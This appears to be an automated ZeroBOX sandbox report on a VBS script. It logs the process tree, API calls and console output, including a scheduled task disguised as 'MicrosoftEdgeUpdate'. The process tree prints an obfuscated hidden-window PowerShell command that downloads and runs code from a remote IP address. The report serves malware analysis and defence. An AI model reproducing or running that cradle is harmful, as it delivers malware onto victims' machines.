Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 5, 2023, 8:55 a.m.	Sept. 5, 2023, 8:57 a.m.

Size	2.0KB
Type	ASCII text, with CRLF line terminators
MD5	`cd6bed1ef56b1e58d23ede753dc7e9e5`
SHA256	`7dc719db44630b6423c7b63d9aeddc7efa08be42d3a0f99db92942d485de133f`
CRC32	`26B1D8ED`
ssdeep	`24:0t8oE5u/Nk4llFIGjWJfu31oo2te8SH0kGVnXWx+t+LTSjRon/MBN/1anpGhVvbM:0t8NuLjm2WJfQp2shqyey/c/1thBbsBv`
Yara	Antivirus - Contains references to security software

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\gen.txt.vbs
2588
- cmd.exe "C:\Windows\System32\cmd.exe" /c POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
  2676
  - powershell.exe POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='VAN(''http://45.138.16.89:222/coder.jpg'')'.RePLACe('VAN','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
    2760

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
45.138.16.89	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 5, 2023, 8:55 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 5, 2023, 8:55 a.m.			0	0

Command line console output was observed (50 out of 75 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: IsPublic IsSerial Name BaseType console_handle: 0x0000001b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000023	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: True True Byte[] System.Array console_handle: 0x00000027	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: True True Byte[] System.Array console_handle: 0x0000002b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: The term 'ï»¿$Content' is not recognized as the name of a cmdlet, function, scr console_handle: 0x00000023	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: ipt file, or operable program. Check the spelling of the name, or if a path was console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: At line:1 char:12 console_handle: 0x00000047	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: + ï»¿$Content <<<< = @' console_handle: 0x00000053	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: + CategoryInfo : ObjectNotFound: (ï»¿$Content:String) [], Command console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: NotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: Name : MicrosoftEdgeUpdate console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: Path : \MicrosoftEdgeUpdate console_handle: 0x00000093	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: State : 3 console_handle: 0x00000097	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: Enabled : True console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: LastRunTime : 1899-12-30 오전 12:00:00 console_handle: 0x0000009f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: LastTaskResult : 1 console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: NumberOfMissedRuns : 0 console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: NextRunTime : 2023-09-05 오후 2:37:09 console_handle: 0x000000ab	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: Definition : System.__ComObject console_handle: 0x000000af	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: Xml : <?xml version="1.0" encoding="UTF-16"?> console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Task version="1.2" xmlns="http://schemas.microsoft.com/wi console_handle: 0x000000b7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: ndows/2004/02/mit/task"> console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <RegistrationInfo> console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Description>Runs a script every 2 minutes</Descriptio console_handle: 0x000000c3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: n> console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: </RegistrationInfo> console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Triggers> console_handle: 0x000000cf	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <TimeTrigger> console_handle: 0x000000d3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Repetition> console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Interval>PT2M</Interval> console_handle: 0x000000db	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <StopAtDurationEnd>false</StopAtDurationEnd> console_handle: 0x000000df	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: </Repetition> console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <StartBoundary>2023-09-05T14:35:09</StartBoundary> console_handle: 0x000000e7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Enabled>true</Enabled> console_handle: 0x000000eb	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: </TimeTrigger> console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: </Triggers> console_handle: 0x000000f3	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Settings> console_handle: 0x000000f7	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesP console_handle: 0x000000fb	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: olicy> console_handle: 0x000000ff	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <DisallowStartIfOnBatteries>false</DisallowStartIfOnBa console_handle: 0x00000103	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: tteries> console_handle: 0x00000107	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> console_handle: 0x0000010b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <AllowHardTerminate>true</AllowHardTerminate> console_handle: 0x0000010f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <StartWhenAvailable>false</StartWhenAvailable> console_handle: 0x00000113	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvai console_handle: 0x00000117	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: lable> console_handle: 0x0000011b	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <IdleSettings> console_handle: 0x0000011f	1	1
WriteConsoleW Sept. 5, 2023, 8:55 a.m.	buffer: <Duration>PT10M</Duration> console_handle: 0x00000123	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b9cf8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba6f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b9b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b9b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002b9b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba3f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba7b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba7b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 5, 2023, 8:55 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002ba838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 5, 2023, 8:55 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72511000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72512000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02622000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02902000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02633000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02634000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0262b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02652000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02635000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0265c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02636000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02653000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02654000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05031000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05032000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05033000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05034000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05035000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05036000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 5, 2023, 8:55 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05037000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
